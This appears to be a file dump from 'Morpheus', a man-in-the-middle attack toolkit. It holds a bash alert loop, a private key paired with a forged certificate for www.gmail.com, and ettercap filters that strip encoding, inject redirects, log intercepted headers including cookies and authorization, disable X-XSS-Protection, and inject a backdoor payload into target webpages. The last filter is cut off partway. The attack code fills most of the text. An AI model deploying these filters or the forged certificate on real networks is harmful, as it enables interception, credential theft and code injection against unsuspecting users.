| 94 | 95 | 96 | # 97 | # Bash Loop funtion .. 98 | # BEEP IF found 'beep-warning.beep' 99 | # 100 | while : 101 | do 102 | # 103 | # sleep time in loop funtion .. 104 | # increase time in old pc's to consume less resources .. 105 | # HINT: this value sets loop and sound warning delay time .. 106 | # 107 | sleep 1.5 108 | 109 | # check for .beep file existence 110 | if [ -e beep-warning.beep ]; then 111 | # store date to dislay at event trigger 112 | hour=`date | awk {'print $4,$5,$6'}` 113 | echo " ✔ Event trigger at: $hour .." 114 | # 115 | # emitt one warning sound (BEEP) 116 | # 117 | if [ "$found" = "ogg" ]; then 118 | cd .. && cd bin && paplay $sound 119 | cd .. && cd logs 120 | else 121 | $sound 122 | sleep 0.3 123 | fi 124 | 125 | # 126 | # build logfile (in logs folder) 127 | # 128 | if [ -e parse.bin ]; then 129 | echo "[Morpheus] Loging Events in: 67/UDP(dst) .." >> $rhost.log 130 | echo " * Interface : $interface" >> $rhost.log 131 | echo " * Modem Ip : $modem" >> $rhost.log 132 | echo " * Hour/Date : $hour" >> $rhost.log 133 | echo " * Device : $rhost.lan" >> $rhost.log 134 | echo " * Action : Request access to local LAN" >> $rhost.log 135 | echo " * ---" >> $rhost.log 136 | echo "" >> $rhost.log 137 | fi 138 | 139 | if [ -e triggertwo.bin ]; then 140 | echo "[Morpheus] Loging Events in: 67/UDP(dst) .." >> $secund.log 141 | echo " * Interface : $interface" >> $secund.log 142 | echo " * Modem Ip : $modem" >> $secund.log 143 | echo " * Hour/Date : $hour" >> $secund.log 144 | echo " * Device : $secund.lan" >> $secund.log 145 | echo " * Action : Request access to local LAN" >> $secund.log 146 | echo " * ---" >> $secund.log 147 | echo "" >> $secund.log 148 | fi 149 | 150 | if [ "$external" = "YES" ]; then 151 | echo "[Morpheus] Loging Events .." >> warn.log 152 | echo " * Interface : $interface" >> warn.log 153 | echo " * Modem Ip : $modem" >> warn.log 154 | echo " * Hour/Date : $hour" >> warn.log 155 | echo " * ---" >> warn.log 156 | echo "" >> warn.log 157 | fi 158 | 159 | 160 | # 161 | # emmit more than one beep just to users to hear it proper .. 162 | # 163 | if [ "$found" = "sys" ]; then 164 | if [ -e beep-warning.beep ]; then 165 | for i in `seq 1 7`; do 166 | printf '\a' 167 | sleep 0.1 168 | done 169 | fi 170 | fi 171 | 172 | # 173 | # delete all files to emitt another sound if the event its trigger again in the future.. 174 | # 175 | if [ -e beep-warning.beep ]; then 176 | rm -f beep-warning.beep > /dev/nul 2>&1 177 | rm -f triggertwo.bin > /dev/nul 2>&1 178 | rm -f parse.bin > /dev/nul 2>&1 179 | fi 180 | fi 181 | 182 | 183 | # end of loop funtion 184 | done 185 | 186 | 187 | cd .. 188 | # exit script execution 189 | exit 190 | 191 | -------------------------------------------------------------------------------- /bin/www.gmail.com.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICXAIBAAKBgQChmFKQItpYFibf9v0sj01WfDmkSvA6HdffsZnHX8pAdF5kiqu8 3 | HM/SSPZ2Ql5tZyTgsHCpSXiYEDkLsQor7TzQpmNVLfWG4K0AJjQ1+a5zMrB/KK1E 4 | r/8IJeevaL60Pj9KXSiQ0PaXYHb2p3cJUSj5Bw/BBpTm9QAK47ls3LdkswIDAQAB 5 | AoGANuvQU9CkqP+OYtxNG9HwlQ5PgPk/QGFYN1zjSRHTaaijVESVLbAVKgFGUtcn 6 | xMMjk4IkKEUiSXxqBwE61cchvbX0+xsQ8v2yHyrstke7fdP+uUuc9gYj164ljmB6 7 | BaoMK8zW8oiars3gODKWJIZbevrpmGd2g5F2xp/FiflcQYECQQDXQ7WiSzTC4SL5 8 | O4qIxhpOJ2DVt+Jdwypfzh3N9Y44umz1fcAPmlK6NP/ed0rb1Q+Pf+J0Q8eMUMXm 9 | 5BXrTp1hAkEAwCyk8mQemKtIQenUX/I8iImb/K/9/ujXYjuJZemOyv9Wn7MZB6OU 10 | MvgJ7HCvw6R8sNCJwyzuIFHCdt3TFRrGkwJBAMPQ9AkOIJCl/Ap7/yksDAHMEGpZ 11 | O7HPN1yvQq14EkfIThWCrpOC7n40eA0GtzICPoVq77STc5JQZ7YBBW9ntAECQB9d 12 | Ke6FeJjiG4DmcMrX9hkynEq5TnLz/XMC1IHVhICM+85EpKkigWVwJe541bbQealB 13 | 37oC8zpDHcHYokKnhBECQHFmOrTZ2FTfWcZzbvMxtPUpQwYdtbCyA2mYO8UIUsGC 14 | SNMikgo+Wc5mkTz4qOdjqdGtVZ8Ej5exOvN5fINWRoE= 15 | -----END RSA PRIVATE KEY----- 16 | -----BEGIN CERTIFICATE----- 17 | MIICezCCAeSgAwIBAgIJKj3setIQTWzdMA0GCSqGSIb3DQEBCwUAMGcxCzAJBgNV 18 | BAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlhMRYwFAYDVQQHDA1Nb3VudGFpbiBW 19 | aWV3MRMwEQYDVQQKDApHb29nbGUgSW5jMRYwFAYDVQQDDA13d3cuZ21haWwuY29t 20 | MB4XDTE3MDYwNzE1MTAwMFoXDTE3MDgzMDE1MTAwMFowZzELMAkGA1UEBhMCVVMx 21 | EzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDU1vdW50YWluIFZpZXcxEzAR 22 | BgNVBAoMCkdvb2dsZSBJbmMxFjAUBgNVBAMMDXd3dy5nbWFpbC5jb20wgZ8wDQYJ 23 | KoZIhvcNAQEBBQADgY0AMIGJAoGBAKGYUpAi2lgWJt/2/SyPTVZ8OaRK8Dod19+x 24 | mcdfykB0XmSKq7wcz9JI9nZCXm1nJOCwcKlJeJgQOQuxCivtPNCmY1Ut9YbgrQAm 25 | NDX5rnMysH8orUSv/wgl569ovrQ+P0pdKJDQ9pdgdvandwlRKPkHD8EGlOb1AArj 26 | uWzct2SzAgMBAAGjLzAtMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGH7+QV7jEcj 27 | EY36vODJyT8pESllMA0GCSqGSIb3DQEBCwUAA4GBAJj4CJwCQrW8DMY6gZSDBu1T 28 | 4kti/xr17svkv0jhGh3kIAbLC/szY2+R7mly+h9uj5Dg6MQdy2Oxop3jyB2TtM5a 29 | roOQ1ECFib9nR+0jUOofG9Vutmr//GaLpislak5s+nhkpadey/EyKTGII40JK3F6 30 | r3JTuRE6yvAlQT3C8lhF 31 | -----END CERTIFICATE----- 32 | -------------------------------------------------------------------------------- /filters/EasterEgg.eft: -------------------------------------------------------------------------------- 1 | ############################################################################ 2 | # # 3 | # HTTPS Request/Response Filter # 4 | # based on code from ALoR & NaGA # 5 | # # 6 | # This program is free software; you can redistribute it and/or modify # 7 | # it under the terms of the GNU General Public License as published by # 8 | # the Free Software Foundation; either version 2 of the License, or # 9 | # (at your option) any later version. # 10 | # # 11 | ############################################################################ 12 | 13 | ## 14 | # This filter will redirect target requests under mitm 15 | # attacks to the specified redirect url. [ http-equiv= ] 16 | ## 17 | 18 | 19 | 20 | # 21 | # Report port 443 + 80 (tcp) traffic just to make displays 22 | # that shows to users that filter its working fine .. 23 | # 24 | if (ip.proto == TCP && tcp.dst == 443 || tcp.src == 443) { 25 | msg("[morpheus] host:ALL [ ⊶ ] port:443 [tcp] https ☆"); 26 | } 27 | 28 | 29 | 30 | 31 | 32 | ########################## 33 | ## Zap Content Encoding ## 34 | ########################## 35 | if (ip.proto == TCP && tcp.dst == 80 || tcp.src == 80){ 36 | if (search(DATA.data, "Accept-Encoding")){ 37 | replace("Accept-Encoding", "Accept-Rubbishh"); 38 | msg("\n[morpheus] host:request [ ⊶ ] found .."); 39 | } 40 | } 41 | 42 | 43 | 44 | ##################### 45 | ## Replace Content ## 46 | ##################### 47 | if (ip.proto == TCP && tcp.src == 80 || tcp.dst == 80){ 48 | if (search(DATA.data, "")) { 49 | msg("[Morpheus] | action: redirecting target traffic ✔"); 50 | msg("[Morpheus] | injec: meta http-equiv on request ✔"); 51 | # redirect target traffic by replacing html tag with one redirection url 52 | replace("", ""); 53 | replace("", ""); 54 | msg("[Morpheus] |_ dns_spoof: IpAdR \n"); 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /filters/IG.eft: -------------------------------------------------------------------------------- 1 | ############################################################################ 2 | # # 3 | # HTTP Request/Response Filter # 4 | # based on code from ALoR & NaGA # 5 | # # 6 | # This program is free software; you can redistribute it and/or modify # 7 | # it under the terms of the GNU General Public License as published by # 8 | # the Free Software Foundation; either version 2 of the License, or # 9 | # (at your option) any later version. # 10 | # # 11 | ############################################################################ 12 | 13 | 14 | ## 15 | # This filter will regex search target captured tcp headers (mitm) 16 | # to gather information about target system browser settings. 17 | # Special Thanks: shanty damayanti 18 | ## 19 | 20 | 21 | 22 | # 23 | # Report port 443 (tcp) traffic just to make displays 24 | # that shows to users that filter its working fine .. 25 | # 26 | if (ip.proto == TCP && tcp.dst == 443 || tcp.src == 443) { 27 | msg("[morpheus] host:TaRgEt [ ⊶ ] port:443 [tcp] https ☆"); 28 | } 29 | 30 | 31 | 32 | # 33 | # Report port 80 (tcp-http) traffic 34 | # regex search headers, write logfile. 35 | # 36 | 37 | RepLaCe 38 | if (ip.proto == TCP && tcp.dst == 80 || tcp.src == 80) { 39 | msg("[morpheus] host:TaRgEt [ ⊶ ] port:80 [tcp] http ☆"); 40 | if (regex(DECODED.data, ".*Host.*")) { 41 | msg("\n[morpheus] host:TaRgEt header:found"); 42 | msg("[morpheus] | status : Target tcp header detected"); 43 | msg("[morpheus] |_ header : Host string found ✔\n"); 44 | log(DECODED.data, "./IG.log"); 45 | }else{ 46 | if (regex(DECODED.data, ".*DNT.*")) { 47 | msg("\n[morpheus] host:TaRgEt header:found"); 48 | msg("[morpheus] | status : Target tcp header detected"); 49 | msg("[morpheus] |_ header : DNT string found ✔\n"); 50 | log(DECODED.data, "./IG.log"); 51 | }else{ 52 | if (regex(DECODED.data, ".*Tk.*")) { 53 | msg("\n[morpheus] host:TaRgEt header:found"); 54 | msg("[morpheus] | status : Target tcp header detected"); 55 | msg("[morpheus] |_ header : Tk string found ✔\n"); 56 | log(DECODED.data, "./IG.log"); 57 | }else{ 58 | if (regex(DECODED.data, ".*From.*")) { 59 | msg("\n[morpheus] host:TaRgEt header:found"); 60 | msg("[morpheus] | status : Target tcp header detected"); 61 | msg("[morpheus] |_ header : From string found ✔\n"); 62 | log(DECODED.data, "./IG.log"); 63 | }else{ 64 | if (regex(DECODED.data, ".*Referer.*")) { 65 | msg("\n[morpheus] host:TaRgEt header:found"); 66 | msg("[morpheus] | status : Target tcp header detected"); 67 | msg("[morpheus] |_ header : Referer string found ✔\n"); 68 | log(DECODED.data, "./IG.log"); 69 | }else{ 70 | if (regex(DECODED.data, ".*Forwarded.*")) { 71 | msg("\n[morpheus] host:TaRgEt header:found"); 72 | msg("[morpheus] | status : Target tcp header detected"); 73 | msg("[morpheus] |_ header : Forwarded string found ✔\n"); 74 | log(DECODED.data, "./IG.log"); 75 | }else{ 76 | if (regex(DECODED.data, ".*Connection.*")) { 77 | msg("\n[morpheus] host:TaRgEt header:found"); 78 | msg("[morpheus] | status : Target tcp header detected"); 79 | msg("[morpheus] |_ header : Connection string found ✔\n"); 80 | log(DECODED.data, "./IG.log"); 81 | }else{ 82 | if (regex(DECODED.data, ".*X-Forwarded-Host.*")) { 83 | msg("\n[morpheus] host:TaRgEt header:found"); 84 | msg("[morpheus] | status : Target tcp header detected"); 85 | msg("[morpheus] |_ header : X-Forwarded-Host string found ✔\n"); 86 | log(DECODED.data, "./IG.log"); 87 | }else{ 88 | if (regex(DECODED.data, ".*X-XSS-Protection.*")) { 89 | msg("\n[morpheus] host:TaRgEt header:found"); 90 | msg("[morpheus] | status : Target tcp header detected"); 91 | msg("[morpheus] |_ header : X-XSS-Protection string found ✔\n"); 92 | log(DECODED.data, "./IG.log"); 93 | }else{ 94 | if (regex(DECODED.data, ".*Content-Encoding.*")) { 95 | msg("\n[morpheus] host:TaRgEt header:found"); 96 | msg("[morpheus] | status : Target tcp header detected"); 97 | msg("[morpheus] |_ header : Content-Encoding string found ✔\n"); 98 | log(DECODED.data, "./IG.log"); 99 | }else{ 100 | if (regex(DECODED.data, ".*Content-Type.*")) { 101 | msg("\n[morpheus] host:TaRgEt header:found"); 102 | msg("[morpheus] | status : Target tcp header detected"); 103 | msg("[morpheus] |_ header : Content-Type string found ✔\n"); 104 | log(DECODED.data, "./IG.log"); 105 | }else{ 106 | if (regex(DECODED.data, ".*Cache-Control.*")) { 107 | msg("\n[morpheus] host:TaRgEt header:found"); 108 | msg("[morpheus] | status : Target tcp header detected"); 109 | msg("[morpheus] |_ header : Cache-Control string found ✔\n"); 110 | log(DECODED.data, "./IG.log"); 111 | }else{ 112 | if (regex(DECODED.data, ".*Server.*")) { 113 | msg("\n[morpheus] host:TaRgEt header:found"); 114 | msg("[morpheus] | status : Target tcp header detected"); 115 | msg("[morpheus] |_ header : Server string found ✔\n"); 116 | log(DECODED.data, "./IG.log"); 117 | }else{ 118 | if (regex(DECODED.data, ".*Content-Language.*")) { 119 | msg("\n[morpheus] host:TaRgEt header:found"); 120 | msg("[morpheus] | status : Target tcp header detected"); 121 | msg("[morpheus] |_ header : Content-Language string found ✔\n"); 122 | log(DECODED.data, "./IG.log"); 123 | }else{ 124 | if (regex(DECODED.data, ".*Accepted-Language.*")) { 125 | msg("\n[morpheus] host:TaRgEt header:found"); 126 | msg("[morpheus] | status : Target tcp header detected"); 127 | msg("[morpheus] |_ header : Accepted-Language string found ✔\n"); 128 | log(DECODED.data, "./IG.log"); 129 | }else{ 130 | if (regex(DECODED.data, ".*Strict-Transport-Security.*")) { 131 | msg("\n[morpheus] host:TaRgEt header:found"); 132 | msg("[morpheus] | status : Target tcp header detected"); 133 | msg("[morpheus] |_ header : Strict-Transport-Security string found ✔\n"); 134 | log(DECODED.data, "./IG.log"); 135 | }else{ 136 | if (regex(DECODED.data, ".*Set-Cookie.*")) { 137 | msg("\n[morpheus] host:TaRgEt header:found"); 138 | msg("[morpheus] | status : Target tcp header detected"); 139 | msg("[morpheus] |_ header : Set-Cookie string found ✔\n"); 140 | log(DECODED.data, "./IG.log"); 141 | }else{ 142 | if (regex(DECODED.data, ".*Access-Control-Allow-Methods.*")) { 143 | msg("\n[morpheus] host:TaRgEt header:found"); 144 | msg("[morpheus] | status : Target tcp header detected"); 145 | msg("[morpheus] |_ header : Access-Control-Allow-Methods string found ✔\n"); 146 | log(DECODED.data, "./IG.log"); 147 | }else{ 148 | if (regex(DECODED.data, ".*User-Agent.*")) { 149 | msg("\n[morpheus] host:TaRgEt header:found"); 150 | msg("[morpheus] | status : Target tcp header detected"); 151 | msg("[morpheus] |_ header : User-Agent string found ✔\n"); 152 | log(DECODED.data, "./IG.log"); 153 | }else{ 154 | if (regex(DECODED.data, ".*Accept-Charset.*")) { 155 | msg("\n[morpheus] host:TaRgEt header:found"); 156 | msg("[morpheus] | status : Target tcp header detected"); 157 | msg("[morpheus] |_ header : Accept-Charset string found ✔\n"); 158 | log(DECODED.data, "./IG.log"); 159 | }else{ 160 | if (regex(DECODED.data, ".*X-Content-Type-Options.*")) { 161 | msg("\n[morpheus] host:TaRgEt header:found"); 162 | msg("[morpheus] | status : Target tcp header detected"); 163 | msg("[morpheus] |_ header : X-Content-Type-Options string found ✔\n"); 164 | log(DECODED.data, "./IG.log"); 165 | }else{ 166 | if (regex(DECODED.data, ".*X-Frame-Options.*")) { 167 | msg("\n[morpheus] host:TaRgEt header:found"); 168 | msg("[morpheus] | status : Target tcp header detected"); 169 | msg("[morpheus] |_ header : X-Frame-Options string found ✔\n"); 170 | log(DECODED.data, "./IG.log"); 171 | }else{ 172 | if (regex(DECODED.data, ".*Authorization.*")) { 173 | msg("\n[morpheus] host:TaRgEt header:found"); 174 | msg("[morpheus] | status : Target tcp header detected"); 175 | msg("[morpheus] |_ header : Authorization string found ✔\n"); 176 | log(DECODED.data, "./IG.log"); 177 | } 178 | } 179 | } 180 | } 181 | } 182 | } 183 | } 184 | } 185 | } 186 | } 187 | } 188 | } 189 | } 190 | } 191 | } 192 | } 193 | } 194 | } 195 | } 196 | } 197 | } 198 | } 199 | } 200 | } 201 | } 202 | -------------------------------------------------------------------------------- /filters/UserAgent.eft: -------------------------------------------------------------------------------- 1 | ############################################################################ 2 | # # 3 | # HTTPS Request/Response Filter # 4 | # based on code from ALoR & NaGA # 5 | # # 6 | # This program is free software; you can redistribute it and/or modify # 7 | # it under the terms of the GNU General Public License as published by # 8 | # the Free Software Foundation; either version 2 of the License, or # 9 | # (at your option) any later version. # 10 | # # 11 | ############################################################################ 12 | 13 | 14 | ## 15 | # This filter will store target packet header to figure it out 16 | # If target its vulnerable to d0s (firefox =< 49.0.1 versions) 17 | ## 18 | 19 | 20 | 21 | 22 | # 23 | # Report port 443 (tcp) traffic just to make displays 24 | # that shows to users that filter its working fine .. 25 | # 26 | if (ip.proto == TCP && tcp.src == 443 || tcp.dst == 443) { 27 | msg("[morpheus] host:TaRONE [ <> ] port:443 [tcp] https ☆"); 28 | } 29 | 30 | 31 | 32 | # 33 | # Report port 80 (tcp) traffic 34 | # And warn attacker that User-Agent has captured... 35 | # 36 | if (ip.proto == TCP && tcp.dst == 80 || tcp.src == 80) { 37 | msg("[morpheus] host:TaRgEt [ ⊶ ] port:80 [tcp] http ☆"); 38 | if (search(DATA.data, "User-Agent")) { 39 | msg("\n[morpheus] host:TaRgEt [ ⊶ ] found .."); 40 | msg("[morpheus] | status: User-Agent detected"); 41 | msg("[morpheus] | info : tcp header found, log stored ✔"); 42 | msg("[morpheus] | log : morpheus/logs/UserAgent.log"); 43 | msg("[morpheus] |_ exec : CHECK IN LOGFILE FOR DATA CAPTURE, AND THEN EXIT CONSOLE\n"); 44 | log(DECODED.data, "./UserAgent.log"); 45 | } 46 | } 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /filters/XSSBypass.eft: -------------------------------------------------------------------------------- 1 | ############################################################################ 2 | # # 3 | # HTTPS Request/Response Filter # 4 | # based on code from ALoR & NaGA # 5 | # # 6 | # This program is free software; you can redistribute it and/or modify # 7 | # it under the terms of the GNU General Public License as published by # 8 | # the Free Software Foundation; either version 2 of the License, or # 9 | # (at your option) any later version. # 10 | # # 11 | # Credits: https://peteris.rocks/blog/exotic-http-headers/ # 12 | ############################################################################ 13 | 14 | 15 | ## 16 | # Cross-Site Scripting (XSS) is an attack In which malicious scripts 17 | # can be injected on a page. the The X-XSS-Protection head value send 18 | # In tcp/udp packet controls this behavior. this filter will change 19 | # the X-XSS-Protection value In header to 0 (disable xss protection) 20 | # 21 | # http://localhost:1234/?user=%3Cscript%3Ealert(%27hacked%27)%3C/script%3E&xss=0 22 | ## 23 | 24 | 25 | 26 | 27 | ########################## 28 | ## Zap Content Encoding ## 29 | ########################## 30 | # change target request to server 31 | if (ip.dst == 'IpAdDR' && ip.proto == TCP && tcp.dst == 80) { 32 | msg("[morpheus] host:IpAdDR [ <- ] port:80 http ☆"); 33 | if (search(DATA.data, "Accept-Encoding")) { 34 | replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string 35 | msg("[Morpheus] | info : Encoding zapped from response ✔"); 36 | }else{ 37 | if (search(DECODED.data, "Accept-Encoding")) { 38 | replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string 39 | msg("[Morpheus] | info : Encoding zapped from response ✔"); 40 | } 41 | } 42 | } 43 | 44 | if (ip.dst == 'IpAdDR' && ip.proto == TCP && tcp.dst == 80) { 45 | if (search(DATA.data, "gzip")) { 46 | replace("gzip", " "); # note: four spaces In the replacement string 47 | msg("[Morpheus] | exec : replacing encoding content!"); 48 | msg("[Morpheus] | info : packet string gzip zapped ✔"); 49 | } 50 | } 51 | 52 | if (ip.dst == 'IpAdDR' && ip.proto == TCP && tcp.dst == 80) { 53 | if (search(DATA.data, "deflate")) { 54 | replace("deflate", " "); # note: seven spaces In the replacement string 55 | msg("[Morpheus] | exec : replacing encoding content!"); 56 | msg("[Morpheus] | info : packet string deflate zapped ✔"); 57 | } 58 | } 59 | 60 | 61 | 62 | 63 | ##################### 64 | ## Replace Content ## 65 | ##################### 66 | # change server response to target 67 | if (ip.dst == 'IpAdDR' && ip.proto == TCP && tcp.src == 80) { 68 | if search(DATA.data, "X-XSS-Protection: 1")){ 69 | replace("X-XSS-Protection: 1", "X-XSS-Protection: 0"); 70 | msg("[morpheus] | info : X-XSS-Protection found in header ☆"); 71 | msg("[Morpheus] | exec : replacing xss protection level ✔"); 72 | msg("[morpheus] |_info : packet forward back to target host ✔\n"); 73 | } 74 | } 75 | 76 | 77 | 78 | 79 | -------------------------------------------------------------------------------- /filters/backdoor-on-the-fly.eft: -------------------------------------------------------------------------------- 1 | ############################################################################ 2 | # # 3 | # HTTPS Request/Response Filter # 4 | # based on code from ALoR & NaGA # 5 | # # 6 | # This program is free software; you can redistribute it and/or modify # 7 | # it under the terms of the GNU General Public License as published by # 8 | # the Free Software Foundation; either version 2 of the License, or # 9 | # (at your option) any later version. # 10 | # # 11 | ############################################################################ 12 | 13 | ## 14 | # This filter will inject one payload into target webpage request 15 | # 'under MitM attacks' replacing the html tag by our code, 16 | # befor sending the webpage requested to target machine! 17 | ## 18 | 19 | 20 | ########################## 21 | ## Zap Content Encoding ## 22 | ########################## 23 | if (ip.proto == TCP && tcp.dst == 80) { 24 | msg("[morpheus] host:IpAdDR [ -> ] port:80 [tcp] http ☆"); 25 | if (search(DATA.data, "Accept-Encoding")) { 26 | replace("Accept-Encoding", "Accept-Nothing!"); 27 | msg("[Morpheus] | status: Encoding zapped from request ✔"); 28 | } 29 | } 30 | 31 | 32 | 33 | ##################### 34 | ## Replace Content ## 35 | ##################### 36 | # IpAdDR == 192.168.1.67 == TARGET HOST 37 | if (ip.proto == TCP && tcp.src == 80) { 38 | if (search(DATA.data, "")) { 39 | replace("", "